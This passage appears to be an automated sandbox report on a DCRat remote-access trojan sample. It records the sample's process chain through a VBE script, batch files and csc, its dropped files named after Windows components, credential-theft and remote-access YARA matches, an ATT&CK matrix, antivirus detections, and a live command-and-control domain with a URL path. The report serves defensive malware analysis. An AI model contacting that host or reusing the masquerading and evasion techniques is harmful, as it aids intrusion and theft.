                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 5788Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 5220Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 7964Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 4040Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 6296Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe TID: 6776Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\dwm.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\dwm.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | File Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0042A69B
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0043C220
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043E6A3 VirtualQuery,GetSystemInfo, 0_2_0043E6A3
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Thread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | File opened: C:\Users\user\AppData\Local
                                    Source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1965549771.0000000000832000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
                                    Source: smartscreen.exe, 0000002A.00000002.2142062522.000000001B68F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1965549771.0000000000832000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: EjS7Q5fFCE.exe, dwm.exe.7.dr, smartscreen.exe.7.dr, ctfmon.exe.7.dr, iEIWJugOSvvEyboGDFYpQ.exe0.7.dr, iEIWJugOSvvEyboGDFYpQ.exe.7.dr, Portsessionsvc.exe.0.dr | Binary or memory string: OiukpR2FK10qHGfSk19T
                                    Source: smartscreen.exe, 0000002A.00000002.2127592575.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | API call chain: ExitProcess graph end node graph_0-24906
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process information queried: ProcessInformation
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043F838
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00447DEE mov eax, dword ptr fs:[00000030h] 0_2_00447DEE
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0044C030 GetProcessHeap, 0_2_0044C030
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Process token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Process token adjusted: Debug
                                    Source: C:\Recovery\dwm.exe | Process token adjusted: Debug
                                    Source: C:\Recovery\dwm.exe | Process token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Process token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Process token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process token adjusted: Debug
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process token adjusted: Debug
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Process token adjusted: Debug
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Process token adjusted: Debug
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043F838
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043F9D5 SetUnhandledExceptionFilter, 0_2_0043F9D5
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0043FBCA
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_00448EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00448EBD
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Memory allocated: page read and write | page guard
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComproviderComponentIntocommon\9j6CCih.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ComproviderComponentIntocommon\Portsessionsvc.exe "C:\ComproviderComponentIntocommon/Portsessionsvc.exe"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline"
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF1F4.tmp" "c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat"
                                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043F654 cpuid 0_2_0043F654
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0043AF0F
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Queries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Queries volume information: C:\ComproviderComponentIntocommon\ctfmon.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe | Queries volume information: C:\ComproviderComponentIntocommon\ctfmon.exe VolumeInformation
                                    Source: C:\Recovery\dwm.exe | Queries volume information: C:\Recovery\dwm.exe VolumeInformation
                                    Source: C:\Recovery\dwm.exe | Queries volume information: C:\Recovery\dwm.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Queries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Queries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Queries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformation
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Queries volume information: C:\ComproviderComponentIntocommon\Portsessionsvc.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Queries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Queries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe | Queries volume information: C:\Windows\Resources\Themes\smartscreen.exe VolumeInformation
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | Queries volume information: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0043DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0043DF1E
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Code function: 0_2_0042B146 GetVersionExW, 0_2_0042B146
                                    Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                    Stealing of Sensitive Information

                                    Source: Yara match | File source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: Portsessionsvc.exe PID: 8076, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: iEIWJugOSvvEyboGDFYpQ.exe PID: 7820, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: smartscreen.exe PID: 1028, type: MEMORYSTR
                                    Source: Yara match | File source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED
                                    Source: Yara match | File source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara match | File source: 00000007.00000002.2024446446.0000000012C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: Portsessionsvc.exe PID: 8076, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: iEIWJugOSvvEyboGDFYpQ.exe PID: 7820, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: smartscreen.exe PID: 1028, type: MEMORYSTR
                                    Source: Yara match | File source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000003.1668240113.0000000006958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000007.00000000.1966174195.0000000000762000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000003.1669422200.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000000.00000003.1668710147.00000000052B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED
                                    Source: Yara match | File source: EjS7Q5fFCE.exe, type: SAMPLE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.5300705.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 7.0.Portsessionsvc.exe.760000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.EjS7Q5fFCE.exe.69a6705.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Recovery\dwm.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe, type: DROPPED
                                    Source: Yara match | File source: C:\Windows\Resources\Themes\smartscreen.exe, type: DROPPED
                                    Source: Yara match | File source: C:\ComproviderComponentIntocommon\ctfmon.exe, type: DROPPED

                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information | Scripting (11) | Valid Accounts | Windows Management Instrumentation (11) | Scripting (11) | DLL Side-Loading (1) | Disable or Modify Tools (1) | OS Credential Dumping | System Time Discovery (1) | Taint Shared Content (1) | Archive Collected Data (11) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                                    Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | File and Directory Discovery (3) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
                                    Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Obfuscated Files or Information (3) | Security Account Manager | System Information Discovery (37) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
                                    Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (31) | Registry Run Keys / Startup Folder (31) | Software Packing (13) | NTDS | Security Software Discovery (121) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
                                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | File Deletion (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (41) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (231) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (41) | Proc Filesystem | System Network Configuration Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (11) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                    (Numbers in parentheses are the per-technique counts shown in the original matrix; cells without a number had no matching signature.)
                                    Behavior Graph ID: 1581773 | Sample: EjS7Q5fFCE.exe | Startdate: 28/12/2024 | Architecture: WINDOWS | Score: 100
                                    Network: 001031cm.nyashteam.ru (172.67.186.200, ports 49736, 49737, 49739, CLOUDFLARENETUS, United States), contacted by the "9 other processes" node
                                    Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 17 other signatures
                                    Process tree (as drawn in the behavior graph):
                                    • EjS7Q5fFCE.exe: dropped C:\...\Portsessionsvc.exe (PE32) and 9ILuIMngNdMuzngHHM...TDwm0yZ13RpFsRY.vbe (data); started wscript.exe
                                      • wscript.exe (Windows Scripting host queries suspicious COM object (likely to drop second stage)): started cmd.exe
                                        • cmd.exe: started Portsessionsvc.exe and conhost.exe
                                          • Portsessionsvc.exe: dropped C:\Windows\Resources\Themes\smartscreen.exe (PE32), C:\Users\user\Desktop\kwWqKlvO.log (PE32), C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe (PE32) and 5 other malicious files; signatures: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Creates an undocumented autostart registry key, 6 other signatures; started cmd.exe, csc.exe, schtasks.exe and 17 other processes
                                            • cmd.exe (Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks): started conhost.exe, chcp.com, PING.EXE and iEIWJugOSvvEyboGDFYpQ.exe
                                            • csc.exe: dropped C:\Windows\...\SecurityHealthSystray.exe (PE32); signature: Infects executable files (exe, dll, sys, html); started conhost.exe and cvtres.exe
                                    • ctfmon.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                                    • dwm.exe
                                    • 9 other processes: contacted 001031cm.nyashteam.ru; dropped C:\Users\user\Desktop\etRRuFlx.log (PE32) and C:\Users\user\AppData\...\Ycxw1CWDXu.bat (DOS); started cmd.exe
                                      • cmd.exe: started conhost.exe and chcp.com



Source | Detection | Scanner | Label
EjS7Q5fFCE.exe | 62% | ReversingLabs | Win32.Trojan.Uztuby
EjS7Q5fFCE.exe | 100% | Avira | VBS/Runner.VPG
EjS7Q5fFCE.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat | 100% | Avira | BAT/Delbat.C
C:\Recovery\dwm.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Windows\Resources\Themes\smartscreen.exe | 100% | Avira | HEUR/AGEN.1323342
C:\ComproviderComponentIntocommon\ctfmon.exe | 100% | Avira | HEUR/AGEN.1323342
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | 100% | Avira | HEUR/AGEN.1323342
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | 100% | Avira | HEUR/AGEN.1323342
C:\ComproviderComponentIntocommon\9ILuIMngNdMuzngHHMAY9BVvKTDwm0yZ13RpFsRY.vbe | 100% | Avira | VBS/Runner.VPG
C:\ComproviderComponentIntocommon\Portsessionsvc.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Recovery\dwm.exe | 100% | Joe Sandbox ML |
C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML |
C:\Windows\Resources\Themes\smartscreen.exe | 100% | Joe Sandbox ML |
C:\ComproviderComponentIntocommon\ctfmon.exe | 100% | Joe Sandbox ML |
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | 100% | Joe Sandbox ML |
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | 100% | Joe Sandbox ML |
C:\ComproviderComponentIntocommon\Portsessionsvc.exe | 100% | Joe Sandbox ML |
C:\ComproviderComponentIntocommon\Portsessionsvc.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\ComproviderComponentIntocommon\ctfmon.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\iEIWJugOSvvEyboGDFYpQ.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\dwm.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\etRRuFlx.log | 25% | ReversingLabs |
C:\Users\user\Desktop\kwWqKlvO.log | 25% | ReversingLabs |
C:\Windows\Resources\Themes\smartscreen.exe | 78% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
Source | Detection | Scanner | Label
http://www.w3. | 0% | Avira URL Cloud | safe
http://001031cm.nyashteam.ru/ | 100% | Avira URL Cloud | malware
http://001031cm.nyashteam.ru | 100% | Avira URL Cloud | malware
http://001031cm.nyashteam.ru/pythonProcessdefaultWordpressdatalifetempcdnDownloads.php | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
